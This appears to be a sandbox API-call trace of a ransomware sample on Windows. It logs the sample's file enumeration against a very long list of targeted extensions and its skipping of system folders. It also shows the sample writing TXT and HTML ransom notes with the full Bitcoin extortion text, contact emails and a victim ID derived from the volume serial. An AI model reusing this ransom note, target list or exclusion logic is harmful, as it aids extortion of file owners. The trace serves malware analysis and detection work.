	[0172.794] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml") returned 109
	[0172.794] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.794] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\Power_2.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml") returned 0x6d
	[0172.794] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.794] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.795] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml"
	[0172.795] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\power_2.provxml") returned 109
	[0172.795] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.795] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.795] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0172.795] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.796] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0172.796] FindNextFileW (in: hFindFile=0xfb91b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa21c0195, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa21c0195, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa21c0195, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 0
	[0172.796] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 1
	[0172.796] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 0
	[0172.797] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime"
	[0172.797] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*"
	[0172.797] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.797] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.797] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0172.797] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.802] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.802] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.805] CloseHandle (hObject=0x39c) returned 1
	[0172.807] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.808] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0172.809] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.809] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.809] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.810] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.810] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0172.810] CloseHandle (hObject=0x39c) returned 1
	[0172.811] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.811] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.811] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.811] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0172.811] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.812] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.812] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0172.815] CloseHandle (hObject=0x39c) returned 1
	[0172.817] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.817] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.818] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.818] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0172.829] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.829] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.829] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.829] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.829] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0172.830] CloseHandle (hObject=0x39c) returned 1
	[0172.830] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8088f595, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x380034, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb95f0
	[0172.830] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*") returned 97
	[0172.831] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.831] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*") returned 0x61
	[0172.831] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.831] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0172.831] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.831] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0172.831] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.832] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0172.832] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.832] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.832] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.832] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0172.832] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.832] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0172.833] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.833] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.833] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.833] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0172.833] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.833] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0172.833] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.834] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0172.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.834] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0172.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.834] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0172.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.834] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.834] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0172.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0172.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0172.835] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.835] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0172.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
